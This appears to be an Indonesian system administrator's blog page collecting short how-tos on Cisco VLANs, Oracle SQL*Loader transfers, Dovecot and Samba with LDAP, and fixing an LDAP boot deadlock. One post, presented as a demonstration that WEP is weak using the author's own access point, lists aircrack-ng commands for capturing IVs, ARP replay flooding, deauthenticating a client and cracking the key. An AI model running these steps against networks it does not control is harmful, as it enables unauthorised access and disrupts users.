Mengubah port untuk menjadi anggota suatu vlan dapat dilakukan dengan mudah, pada contoh ini diandaikan port Fa2/0/48 akan dijadikan anggota vlan : vlan-2, dimana sebelumnya Fa2/0/48 adalah anggota vlan : FC

1. periksa sebelum perubahan
3750-FC(21)#sh vlan
VLAN Name Status Ports
—- ——————————– ——— ——————————-
1 default active Gi2/0/2, Gi2/0/4
2 vlan-2 active Fa2/0/45, Fa2/0/47
3 Vlan-Management active
21 FC active Fa2/0/1, Fa2/0/2, Fa2/0/3
Fa2/0/4, Fa2/0/5, Fa2/0/6
Fa2/0/7, Fa2/0/8, Fa2/0/9
Fa2/0/10, Fa2/0/11, Fa2/0/12
Fa2/0/13, Fa2/0/14, Fa2/0/15
Fa2/0/16, Fa2/0/17, Fa2/0/18
Fa2/0/19, Fa2/0/20, Fa2/0/21
Fa2/0/22, Fa2/0/23, Fa2/0/24
Fa2/0/25, Fa2/0/26, Fa2/0/27
Fa2/0/28, Fa2/0/29, Fa2/0/30
Fa2/0/31, Fa2/0/32, Fa2/0/33
Fa2/0/34, Fa2/0/35, Fa2/0/36
Fa2/0/37, Fa2/0/38, Fa2/0/39
Fa2/0/40, Fa2/0/41, Fa2/0/42
Fa2/0/43, Fa2/0/44, Fa2/0/46
Fa2/0/48

2. masuk kedalam mode config
3750-FC(21)#config t
3750-FC(21)(config)#

3. masuk ke port yang akan diubah, pd contoh Fa2/0/48
3750-FC(21)(config)#interface Fa2/0/48
3750-FC(21)(config-if)#

4. ubah keanggotaan vlan
3750-FC(21)(config-if)#switchport access vlan 2
3750-FC(21)(config-if)#

5. simpan perubahan tanpa shutdown
3750-FC(21)(config-if)#no shutdown
3750-FC(21)(config-if)#^Z

6. lihat perubahan
3750-FC(21)#sh vlan
VLAN Name Status Ports
—- ——————————– ——— ——————————-
1 default active Gi2/0/2, Gi2/0/4
2 vlan-2 active Fa2/0/45, Fa2/0/47, Fa2/0/48
3 Vlan-Management active
21 FC active Fa2/0/1, Fa2/0/2, Fa2/0/3
Fa2/0/4, Fa2/0/5, Fa2/0/6
Fa2/0/7, Fa2/0/8, Fa2/0/9
Fa2/0/10, Fa2/0/11, Fa2/0/12
Fa2/0/13, Fa2/0/14, Fa2/0/15
Fa2/0/16, Fa2/0/17, Fa2/0/18
Fa2/0/19, Fa2/0/20, Fa2/0/21
Fa2/0/22, Fa2/0/23, Fa2/0/24
Fa2/0/25, Fa2/0/26, Fa2/0/27
Fa2/0/28, Fa2/0/29, Fa2/0/30
Fa2/0/31, Fa2/0/32, Fa2/0/33
Fa2/0/34, Fa2/0/35, Fa2/0/36
Fa2/0/37, Fa2/0/38, Fa2/0/39
Fa2/0/40, Fa2/0/41, Fa2/0/42
Fa2/0/43, Fa2/0/44, Fa2/0/46

Berapa lama switch cisco sudah on ?, kadang kita hanya mendapatkan report dari end user kalau jaringan putus pada hari x jam y, benar atau tidak, dapat dilihat salah satunya dengan membaca berapa switch itu hidup. Kerusakan yang paling umum dan sederhana bukan karena switch tapi UPS-nya.

SW-CB-19#sh ver
Cisco IOS Software, C3750 Software (C3750-IPBASE-M), Version 12.2(25)SEB4, RELEASE SOFTWARE (fc1)
Copyright (c) 1986-2005 by Cisco Systems, Inc.
Compiled Tue 30-Aug-05 15:47 by yenanh

ROM: Bootstrap program is C3750 boot loader
BOOTLDR: C3750 Boot Loader (C3750-HBOOT-M) Version 12.2(25r)SEC, RELEASE SOFTWARE (fc4)
SW-CB-19 uptime is 16 weeks, 3 days, 15 hours, 29 minutes
System returned to ROM by power-on
System image file is “flash:c3750-ipbase-mz.122-25.SEB4/c3750-ipbase-mz.122-25.SEB4.bin”

cisco WS-C3750-24P (PowerPC405) processor (revision J0) with 118784K/12280K bytes of memory.
Processor board ID CAT1019Z26N
Last reset from power-on
4 Virtual Ethernet interfaces
72 FastEthernet interfaces
6 Gigabit Ethernet interfaces
The password-recovery mechanism is enabled.

512K bytes of flash-simulated non-volatile configuration memory.
Base ethernet MAC Address : 00:18:18:3F:76:00
Motherboard assembly number : 73-9672-09
Power supply part number : 341-0029-04
Motherboard serial number : CAT101906WM
Power supply serial number : DTH1017CSM0
Model revision number : J0
Motherboard revision number : A0
Model number : WS-C3750-24PS-S
System serial number : CAT1019Z26N
Top Assembly Part Number : 800-25860-04
Top Assembly Revision Number : A0
Version ID : V05
CLEI Code Number : CNMV1K0CRD
Hardware Board Revision Number : 0×01

Switch Ports Model SW Version SW Image
—— —– —– ———- ———-
* 1 26 WS-C3750-24P 12.2(25)SEB4 C3750-IPBASE-M
2 52 WS-C3750-48TS 12.2(25)SEB4 C3750-IPBASE-M

Switch 02
———
Switch Uptime : 16 weeks, 3 days, 15 hours, 31 minutes
Base ethernet MAC Address : 00:17:E0:C8:76:80
Motherboard assembly number : 73-9680-10
Power supply part number : 341-0028-02
Motherboard serial number : CAT101728VU
Power supply serial number : DTH10172931
Model revision number : M0
Motherboard revision number : A0
Model number : WS-C3750-48TS-S
System serial number : CAT1018Z126
SFP Module assembly part number : 73-7757-03
SFP Module revision number : A0
SFP Module serial number : CAT10140Y32
Top assembly part number : 800-25854-02
Top assembly revision number : D0
Version ID : V05
CLEI Code Number : CNMV300CRE

Configuration register is 0xF

sqlloader II, adalah kelanjutan sqlloader I , dengan menggunakan type data DATE

##########################################################################
# sqlloader II with date
##########################################################################
1. login sqlplus di oracle server I [orcl1]
[oracle@orcl1 ~]$ sqlplus scott/tiger@orcl1

2. periksa struktur
SQL> desc emp;
Name Null? Type
—————————————– ——– —————————-
EMPNO NOT NULL NUMBER(4)
ENAME VARCHAR2(10)
JOB VARCHAR2(9)
MGR NUMBER(4)
HIREDATE DATE
SAL NUMBER(7,2)
COMM NUMBER(7,2)
DEPTNO NUMBER(2)

3. membuat script sql untuk export ke text file
SQL> host
[oracle@orcl1 ~]$ vi emp_txt.sql
set linesize 120;
set feedback off;
set HEADING off;
set pagesize 0;
SELECT
EMPNO || ‘,’ || ENAME || ‘,’ || JOB || ‘,’ || MGR || ‘,’ || to_char(HIREDATE,’DD-MON-YYYY’) || ‘,’ || SAL || ‘,’ || COMM || ‘,’ || DEPTNO
FROM EMP;
[oracle@orcl1 ~]$ exit

4. data di table dept ditambahkan
SQL> SET LIN 150
SQL> SELECT * FROM EMP;
EMPNO ENAME JOB MGR HIREDATE SAL COMM DEPTNO
———- ———- ——— ———- ——— ———- ———- ———-
7369 SMITH CLERK 7902 17-DEC-80 800 20
7499 ALLEN SALESMAN 7698 20-FEB-81 1600 300 30
7521 WARD SALESMAN 7698 22-FEB-81 1250 500 30
7566 JONES MANAGER 7839 02-APR-81 2975 20
7654 MARTIN SALESMAN 7698 28-SEP-81 1250 1400 30
7698 BLAKE MANAGER 7839 01-MAY-81 2850 30
7782 CLARK MANAGER 7839 09-JUN-81 2450 10
7788 SCOTT ANALYST 7566 19-APR-87 3000 20
7839 KING PRESIDENT 17-NOV-81 5000 10
7844 TURNER SALESMAN 7698 08-SEP-81 1500 0 30
7876 ADAMS CLERK 7788 23-MAY-87 1100 20
7900 JAMES CLERK 7698 03-DEC-81 950 30
7902 FORD ANALYST 7566 03-DEC-81 3000 20
7934 MILLER CLERK 7782 23-JAN-82 1300 10

SQL> insert into emp values (9001,’SEAG’,'PRG’,7839,TO_DATE(’2009/06/29′,’YYYY/MM/DD’),1000,50,41);
SQL> insert into emp values (9002,’WARI’,'PRG’,7839,TO_DATE(’2009/06/29′,’YYYY/MM/DD’),1000,50,41);
SQL> commit;

SQL> SELECT * FROM EMP;
EMPNO ENAME JOB MGR HIREDATE SAL COMM DEPTNO
———- ———- ——— ———- ——— ———- ———- ———-
9001 SEAG PRG 7839 29-JUN-09 1000 50 41
9002 WARI PRG 7839 29-JUN-09 1000 50 41
7369 SMITH CLERK 7902 17-DEC-80 800 20
7499 ALLEN SALESMAN 7698 20-FEB-81 1600 300 30
7521 WARD SALESMAN 7698 22-FEB-81 1250 500 30
7566 JONES MANAGER 7839 02-APR-81 2975 20
7654 MARTIN SALESMAN 7698 28-SEP-81 1250 1400 30
7698 BLAKE MANAGER 7839 01-MAY-81 2850 30
7782 CLARK MANAGER 7839 09-JUN-81 2450 10
7788 SCOTT ANALYST 7566 19-APR-87 3000 20
7839 KING PRESIDENT 17-NOV-81 5000 10
7844 TURNER SALESMAN 7698 08-SEP-81 1500 0 30
7876 ADAMS CLERK 7788 23-MAY-87 1100 20
7900 JAMES CLERK 7698 03-DEC-81 950 30
7902 FORD ANALYST 7566 03-DEC-81 3000 20
7934 MILLER CLERK 7782 23-JAN-82 1300 10
SQL> exit

5. lakukan export ke text file
[oracle@orcl1 ~]$ cat emp_txt.sql | sqlplus -s scott/tiger@orcl1 > emp_1.txt
[oracle@orcl1 ~]$ cat emp_1.txt
9001,SEAG,PRG,7839,29-JUN-2009,1000,50,41
9002,WARI,PRG,7839,29-JUN-2009,1000,50,41
7369,SMITH,CLERK,7902,17-DEC-1980,800,,20
7499,ALLEN,SALESMAN,7698,20-FEB-1981,1600,300,30
7521,WARD,SALESMAN,7698,22-FEB-1981,1250,500,30
7566,JONES,MANAGER,7839,02-APR-1981,2975,,20
7654,MARTIN,SALESMAN,7698,28-SEP-1981,1250,1400,30
7698,BLAKE,MANAGER,7839,01-MAY-1981,2850,,30
7782,CLARK,MANAGER,7839,09-JUN-1981,2450,,10
7788,SCOTT,ANALYST,7566,19-APR-1987,3000,,20
7839,KING,PRESIDENT,,17-NOV-1981,5000,,10
7844,TURNER,SALESMAN,7698,08-SEP-1981,1500,0,30
7876,ADAMS,CLERK,7788,23-MAY-1987,1100,,20
7900,JAMES,CLERK,7698,03-DEC-1981,950,,30
7902,FORD,ANALYST,7566,03-DEC-1981,3000,,20
7934,MILLER,CLERK,7782,23-JAN-1982,1300,,10

6. untuk melakukan sqlloader ke server ke 2 [orcl2], perlu dibuat file controlnya
[oracle@orcl1 ~]$ vi emp.ctl
load data
INFILE emp_1.txt
APPEND
into table emp
fields terminated by “,”
TRAILING NULLCOLS
(EMPNO,ENAME,JOB,MGR,HIREDATE,SAL,COMM,DEPTNO)

7. periksa keadaan tabel sebelum di sqlloader
[oracle@orcl1 ~]$ sqlplus scott/tiger@orcl2
SQL> SET LIN 150
SQL> SELECT * FROM EMP;
EMPNO ENAME JOB MGR HIREDATE SAL COMM DEPTNO
———- ———- ——— ———- ——— ———- ———- ———-
7369 SMITH CLERK 7902 17-DEC-80 800 20
7499 ALLEN SALESMAN 7698 20-FEB-81 1600 300 30
7521 WARD SALESMAN 7698 22-FEB-81 1250 500 30
7566 JONES MANAGER 7839 02-APR-81 2975 20
7654 MARTIN SALESMAN 7698 28-SEP-81 1250 1400 30
7698 BLAKE MANAGER 7839 01-MAY-81 2850 30
7782 CLARK MANAGER 7839 09-JUN-81 2450 10
7788 SCOTT ANALYST 7566 19-APR-87 3000 20
7839 KING PRESIDENT 17-NOV-81 5000 10
7844 TURNER SALESMAN 7698 08-SEP-81 1500 0 30
7876 ADAMS CLERK 7788 23-MAY-87 1100 20
7900 JAMES CLERK 7698 03-DEC-81 950 30
7902 FORD ANALYST 7566 03-DEC-81 3000 20
7934 MILLER CLERK 7782 23-JAN-82 1300 10
SQL> exit

8. menjalankan sqlloader
[oracle@orcl1 ~]$ sqlldr userid=scott/tiger@orcl2 control=emp.ctl log=emp.log

9. periksa keadaan tabel sesudah di sqlloader
[oracle@orcl1 ~]$ sqlplus scott/tiger@orcl2
SQL> SET LIN 150
SQL> SELECT * FROM EMP;
EMPNO ENAME JOB MGR HIREDATE SAL COMM DEPTNO
———- ———- ——— ———- ——— ———- ———- ———-
9001 SEAG PRG 7839 29-JUN-09 1000 50 41
9002 WARI PRG 7839 29-JUN-09 1000 50 41
7369 SMITH CLERK 7902 17-DEC-80 800 20
7499 ALLEN SALESMAN 7698 20-FEB-81 1600 300 30
7521 WARD SALESMAN 7698 22-FEB-81 1250 500 30
7566 JONES MANAGER 7839 02-APR-81 2975 20
7654 MARTIN SALESMAN 7698 28-SEP-81 1250 1400 30
7698 BLAKE MANAGER 7839 01-MAY-81 2850 30
7782 CLARK MANAGER 7839 09-JUN-81 2450 10
7788 SCOTT ANALYST 7566 19-APR-87 3000 20
7839 KING PRESIDENT 17-NOV-81 5000 10
7844 TURNER SALESMAN 7698 08-SEP-81 1500 0 30
7876 ADAMS CLERK 7788 23-MAY-87 1100 20
7900 JAMES CLERK 7698 03-DEC-81 950 30
7902 FORD ANALYST 7566 03-DEC-81 3000 20
7934 MILLER CLERK 7782 23-JAN-82 1300 10
SQL> exit

sqlloader digunakan untuk 2 hal :

1. memindahkan dari database selain oracle ke oracle

2. memindahkan database dari kantor cabang ke kantor pusat, dimana kantor cabang ke kantor pusat tidak terhubung secara online karena keterbatasan bandwidth  internet.

Pada contoh dibawah ini, saya lengkapi script untuk memindahkan database oracle [database 1 / kantor cabang / sid : orcl1 / langkah 1 sd 5] ke format text file, kemudian saya lakukan sqlloader ke server database lainnya [database 2 / kantor pusat / sid : orcl2 / langkah 6 sd 9]

##########################################################################
# sqlloader I
##########################################################################
1. login sqlplus di oracle server I [orcl1]
[oracle@orcl1 ~]$ sqlplus scott/tiger@orcl1

2. periksa struktur
SQL> desc dept;
Name Null? Type
—————————————– ——– —————————-
DEPTNO NOT NULL NUMBER(2)
DNAME VARCHAR2(14)
LOC VARCHAR2(13)

3. membuat script sql untuk export ke text file
SQL> host
[oracle@orcl1 ~]$ vi above_file.sql
set linesize 120;
set feedback off;
set HEADING off;
set pagesize 0;
SELECT
DEPTNO || ‘,’ || DNAME || ‘,’ || LOC
FROM
dept;
[oracle@orcl1 ~]$ exit

4. data di table dept ditambahkan
SQL> select * from dept;
DEPTNO DNAME LOC
———- ————– ————-
10 ACCOUNTING NEW YORK
20 RESEARCH DALLAS
30 SALES CHICAGO
40 OPERATIONS BOSTON

SQL> insert into dept values (41,’IT’,'SURABAYA’);
SQL> insert into dept values (42,’MKT’,'SURABAYA’);
SQL> commit;

SQL> select * from dept;
DEPTNO DNAME LOC
———- ————– ————-
41 IT SURABAYA
42 MKT SURABAYA
10 ACCOUNTING NEW YORK
20 RESEARCH DALLAS
30 SALES CHICAGO
40 OPERATIONS BOSTON

5. lakukan export ke text file
SQL> exit
[oracle@orcl1 ~]$ cat above_file.sql | sqlplus -s scott/tiger@orcl1 > dept_290609.txt
[oracle@orcl1 ~]$ cat dept_290609.txt
41,IT,SURABAYA
42,MKT,SURABAYA
10,ACCOUNTING,NEW YORK
20,RESEARCH,DALLAS
30,SALES,CHICAGO
40,OPERATIONS,BOSTON

6. untuk melakukan sqlloader ke server ke 2 [orcl2], perlu dibuat file controlnya
[oracle@orcl1 ~]$ vi dept.ctl
load data
INFILE dept_290609.txt
APPEND
into table DEPT
fields terminated by “,”
TRAILING NULLCOLS
(DEPTNO,DNAME,LOC)

7. periksa keadaan tabel sebelum di sqlloader
[oracle@orcl1 ~]$ sqlplus scott/tiger@orcl2
SQL> select * from dept;
DEPTNO DNAME LOC
———- ————– ————-
10 ACCOUNTING NEW YORK
20 RESEARCH DALLAS
30 SALES CHICAGO
40 OPERATIONS BOSTON
SQL> exit

8. menjalankan sqlloader
[oracle@orcl1 ~]$ sqlldr userid=scott/tiger@orcl2 control=dept.ctl log=dept.log

9. periksa keadaan tabel sesudah di sqlloader
[oracle@orcl1 ~]$ sqlplus scott/tiger@orcl2
SQL> select * from dept;
DEPTNO DNAME LOC
———- ————– ————-
41 IT SURABAYA
42 MKT SURABAYA
10 ACCOUNTING NEW YORK
20 RESEARCH DALLAS
30 SALES CHICAGO
40 OPERATIONS BOSTON
SQL> exit

ARTIKEL INI UNTUK MENUNJUKKAN “WEP” SANGAT RENTAN UNTUK DIHACK, SEDANGKAN TARGET HANYA SEBUAH AP MILIK SENDIRI

====================================================================================
BACK TRACK BACK TRACK BACK TRACK — card eth1
====================================================================================
1. setup wifi
============================
console 1
============================
airmon-ng stop eth1
airmon-ng start wifi0

2. periksa sinyal – sinyal AP
============================
console 1
============================
airodump-ng eth1

============================
sasaran
============================
SSID : NETGEAR2
CHANNEL : 1
MAC AP (BSSID) : 00:90:4C:7E:00:10
MAC CLIENT-AP : 00:08:9F:F1:07:2B

3. menangkap ivs
a. menangkap ivs
============================
console 2
============================
airodump-ng –-channel 1 -–bssid 00:90:4C:7E:00:10 -w hasil eth1

b. membanjiri packet arp
==============
[console 3]
==============
aireplay-ng –-arpreplay -b 00:90:4C:7E:00:10 -h 00:08:9F:F1:07:2B eth1

c. lakukan Deauthentication
==============
[console 4]
==============
aireplay-ng –deauth 5 -c 00:08:9F:F1:07:2B -a 00:90:4C:7E:00:10 eth1

4. membuka hasil ivs (ivs = 25000)
aircrack-ng hasil*.cap

tar: This does not look like a tar archive
tar: Skipping to next header
tar: Archive contains obsolescent base-64 headers

1. jika pada saat menjalankan restore hasil tar untuk file tar.gz
[pada contoh saya menggunakan nama file tgz]

# tar xvf 01snrbjm_bhstaff.tgz
tar: This does not look like a tar archive
tar: Skipping to next header
tar: Archive contains obsolescent base-64 headers

2. solusinya dengan menjalankan
a. gzip terlebih dulu
# gzip -d 04mg_bhstaff.tgz

b. baru kemudian menjalankan
# tar -xvf 04mg_bhstaff.tar

Dengan memantau server menggunakan tail -f /var/log/messages, ternyata ada error sebagai berikut :

Apr 28 14:41:44 linux dovecot(pam_unix)[13395]: authentication failure; logname= uid=0 euid=0 tty= ruser= rhost= user=SEAG
Apr 28 15:46:52 linux dovecot(pam_unix)[14785]: authentication failure; logname= uid=0 euid=0 tty= ruser= rhost= user=iker
Apr 29 11:08:27 linux dovecot(pam_unix)[26859]: authentication failure; logname= uid=0 euid=0 tty= ruser= rhost= user=INRA

hal ini terjadi karena user – user itu memang tidak didaftarkan pada authentification pam_unix, saya menggunakan SSO [single sign on] dengan LDAP
cara mengatasi error juga sangat simple [kalau sudah tahu], caranya sebagai berikut :

1. edit /etc/dovecot.conf
# mv /etc/dovecot.conf /etc/dovecot.conf.asli
# vi /etc/dovecot.conf
protocol managesieve {
sieve=~/.dovecot.sieve
sieve_storage=~/sieve
}

protocol lda {
postmaster_address = root@ubslinux.com
}

auth default {
mechanisms = plain
passdb ldap {
args = /etc/dovecot-ldap.conf
}

userdb ldap {
args = /etc/dovecot-ldap.conf
}
user = root
}
protocols = pop3 pop3s imap imaps
mail_location = maildir:~/Maildir
valid_chroot_dirs = /home

2. buat file /etc/dovecot-ldap.conf
vi /etc/dovecot-ldap.conf
hosts = localhost
dn = cn=Manager,dc=ubslinux,dc=com
dnpass = password
tls = no
ldap_version = 2
base = uid=%u,ou=people,dc=ubslinux,dc=com
scope = subtree
pass_attrs = uid=user,userPassword=password
default_pass_scheme = CRYPT

Pada saat setup service samba, walaupun service berjalan normal, serta dapat digunakan dengan baik.
Tetatpi ternyata jika diperiksa dengan tail /var/log /messages, akan dijumpai seperti berikut :
================
error :
================
1. Apr 30 10:57:43 linux smbd[8416]: call_nt_transact_ioctl(0×9009c): Currently not implemented.
2. Apr 30 11:00:57 linux smbd[7304]: nb03 (172.20.200.222) couldn’t find service cb_pp
3. Apr 30 14:50:48 linux smbd[16682]: [2009/04/30 14:50:48, 0] smbd/service.c:make_connection(1191)
4. Apr 30 14:50:48 linux smbd[16682]: kf99 (172.20.231.99) couldn’t find service gv_pp
5. Apr 30 14:54:16 linux smbd[15895]: [2009/04/30 14:54:16, 0] lib/util_sock.c:read_data(534)
6. Apr 30 14:54:16 linux smbd[15895]: read_data: read failure for 4 bytes to client 172.20.200.15. Error = No route to host

setelah “putar-putar”, ternyata jawaban simpel, ya karena konfigurasi sambanya kurang lengkap ?????
memang saya belum optimal untuk explorasi, mana saja yang nggak perlu ditulis di smb.conf yang baru
sebab sudah dikejar deadline……………server dibutuhkan segera

intinya setiapkali ganti versi samba, ternayata tidak serta merta konfigurasi dapat dipakai semua.

==========================
KONFIGURASI LAMA smb.conf
==========================
[global]
netbios name = linux
admin users = Administrator

workgroup = UBSLINUX.COM
server string = linux
encrypt passwords = yes
os level = 65

domain master = yes
preferred master = yes
domain logons = yes

passdb backend = ldapsam:ldap://localhost
ldap suffix = dc=ubslinux,dc=com
ldap admin dn = cn=Manager,dc=ubslinux,dc=com
ldap user suffix = ou=People
ldap group suffix = ou=Group
ldap machine suffix = ou=Computers
ldap passwd sync = yes

logon path =
logon home =
logon drive =

log file = /var/log/samba/%m.log
max log size = 50
security = domain

socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192
dns proxy = no

idmap uid = 16777216-33554431
idmap gid = 16777216-33554431
template shell = /bin/false
winbind use default domain = yes
ldap passwd sync = yes
winbind use default domain = no
#================== EDP Share Definitions ===================
[edp_driver]
comment = directory edp driver
path = /s01/driver
valid users = @edp_driver
write list = @edp_driver
create mask = 0775
directory mask = 0775

==========================
KONFIGURASI BARU smb.conf
==========================
[global]
netbios name = LINUX
admin users = Administrator

workgroup = UBSLINUX.COM
server string = Samba Server
encrypt passwords = yes
os level = 33

domain master = yes
preferred master = yes
domain logons = yes

passdb backend = ldapsam:ldap://localhost
ldap suffix = dc=ubslinux,dc=com
ldap admin dn = cn=Manager,dc=ubslinux,dc=com
ldap user suffix = ou=People
ldap group suffix = ou=Group
ldap machine suffix = ou=Computers
ldap passwd sync = yes
add machine script = /usr/local/sbin/smbldap-useradd.pl -w %u
add user script = /usr/local/sbin/smbldap-useradd -m “%u”
delete user script = /usr/local/sbin/smbldap-userdel “%u”
add machine script = /usr/local/sbin/smbldap-useradd -t 0 -w “%u”
add group script = /usr/local/sbin/smbldap-groupadd -p “%g”
delete group script = /usr/local/sbin/smbldap-groupdel “%g”
add user to group script = /usr/local/sbin/smbldap-groupmod -m “%u” “%g”
delete user from group script = /usr/local/sbin/smbldap-groupmod -x “%u” “%g”
set primary group script = /usr/local/sbin/smbldap-usermod -g ‘%g’ ‘%u’
load printers = yes
log file = /var/log/samba/%m.log
max log size = 50
security = domain
socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192
dns proxy = no
idmap uid = 15000-80000
idmap gid = 15000-80000
template shell = /bin/false
winbind use default domain = no
ldap passwd sync = yes

logon path =
logon drive =
logon home =
logon script =

passwd program = /usr/local/sbin/smbldap-passwd -u %u
passwd chat = “Changing password for*\nNew password*” %n\n “*Retype new password*” %n\n”
log level = 0
syslog = 0
time server = Yes
printer admin = @”Print Operators”
load printers = Yes
create mask = 0640
directory mask = 0750
nt acl support = No
printing = cups
printcap name = cups
deadtime = 10
guest account = nobody
map to guest = Bad User
dont descend = /proc,/dev,/etc,/lib,/lost+found,/initrd
show add printer wizard = yes
preserve case = yes
short preserve case = yes
case sensitive = no

#================== EDP Share Definitions ===================
[edp_driver]
comment = directory edp driver
path = /s01/driver
valid users = @edp_driver
write list = @edp_driver
create mask = 0775
directory mask = 0775

====================================
SERVER LAMA [LDAP database ldbm ]
====================================
1. jalankan slapcat
# slapcat -l /home/oracle/test01.txt

2. pindahkan ke server baru

====================================
SERVER BARU [LDAP database bdb ]
====================================
1. matikan Authentication LDAP SERVER
# authconfig –disableldap –enableshadow –disableldapauth –ldapserver=127.0.0.1 –ldapbasedn=dc=ubslinux,dc=com –update

2. matikan service ldap
# service ldap stop

3. lakukan konfigurasi
# rm /var/lib/ldap/* -f
# cp /etc/openldap/DB_CONFIG.example /var/lib/ldap/DB_CONFIG
# slapadd -l test01.txt -f /etc/openldap/slapd.conf
# chown ldap.ldap /var/lib/ldap/*

4. hidupkan service ldap
# service ldap start

5. aktifkan Authentication LDAP SERVER
# authconfig –enableldap –enableshadow –enableldapauth –ldapserver=127.0.0.1 –ldapbasedn=dc=ubslinux,dc=com –update

Adakalanya setelah kita setup, agar server memiliki Authentication ke LDAP dan kebetulan server LDAP ada pada mesin yang sama, maka setelah server reboot, maka server seolah – olah deadlock, mengapa hal ini terjadi ?
TEST
1. mengaktifkan ldap & agar ldap  setiap kali mesin hidup
# service ldap start
# chkconfig ldap on

2. setup agar Authentication ke LDAP
# setup

âââââââââ⤠Choose a Tool âââââââââââ
â â
â Authentication configuration â
â Firewall configuration â
â Keyboard configuration â
â Network configuration â
â System services â
â Timezone configuration â
â X configuration â
â â
â ââââââââââââ ââââââââ â
â â Run Tool â â Quit â â
â ââââââââââââ ââââââââ â
â â
â â
ââââââââââââââââââââââââââââââââââââ

âââââââââââââââââ⤠Authentication Configuration âââââââââââââââââââ
â â
â User Information Authentication â
â [ ] Cache Information [ ] Use MD5 Passwords â
â [ ] Use Hesiod [*] Use Shadow Passwords â
â [*] Use LDAP [*] Use LDAP Authentication â
â [ ] Use NIS [ ] Use Kerberos â
â [ ] Use Winbind [ ] Use SMB Authentication â
â [ ] Use Winbind Authentication â
â [ ] Local authorization is sufficient â
â â
â ââââââââââ ââââââââ â
â â Cancel â â Next â â
â ââââââââââ ââââââââ â
â â
â â
âââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââââ

ââââââââââââââââââ⤠LDAP Settings âââââââââââââââââââ
â â
â [ ] Use TLS â
â Server: ldap://127.0.0.1/_______________________ â
â Base DN: dc=ubslinux,dc=com______________________ â
â â
â ââââââââ ââââââ â
â â Back â â Ok â â
â ââââââââ ââââââ â
â â
â â
âââââââââââââââââââââââââââââââââââââââââââââââââââââ

3. test untuk reboot
# reboot

4. maka akan terjadi deadlock, mengatasi deadlock dengan cara :
a. booting dengan pilihan linux single
b. lakukan setup seperti langkah no 2, tetapi dengan menghilangkan Authentication ke LDAP
c. reboot ulang atau ketik exit

5. agar tidak terjadi deadlock setiap kali booting, maka dapat diatasi dengan cara mengedit service ldap
# vi /etc/init.d/ldap
case “$1″ in
start)
start
/usr/bin/authconfig –enableldap –enableshadow –enableldapauth –ldapserver=127.0.0.1 –ldapbasedn=dc=ubslinux,dc=com –update
RETVAL=$?
;;
stop)
stop
/usr/bin/authconfig –disableldap –enableshadow –disableldapauth –ldapserver=127.0.0.1 –ldapbasedn=dc=ubslinux,dc=com –update

###################################################################
# untuk perintah authconfig yang tidak menegenal perintah update
# diganti dengan kickstart [FC 4, 2, centos 4]
###################################################################
# vi /etc/init.d/ldap
case “$1″ in
start)
start
/usr/bin/authconfig –enableldap –enableshadow –enableldapauth –ldapserver=127.0.0.1 –ldapbasedn=dc=ubslinux,dc=com –kickstart
RETVAL=$?
;;
stop)
stop
/usr/bin/authconfig –disableldap –enableshadow –disableldapauth –ldapserver=127.0.0.1 –ldapbasedn=dc=ubslinux,dc=com –kickstart

6. jika karena sesuatu hal mesin reboot tidak normal dan belum sempat service ldap stop, maka langkah yang harus dijalankan langkah no 4
atau

a. setelah booting linux singgle
b. jalankan perintah
/usr/bin/authconfig –disableldap –enableshadow –disableldapauth –ldapserver=127.0.0.1 –ldapbasedn=dc=ubslinux,dc=com –update

Blog Stats

  • 28,570 hits

 

Juli 2009
S S R K J S M
« Jun    
 12345
6789101112
13141516171819
20212223242526
2728293031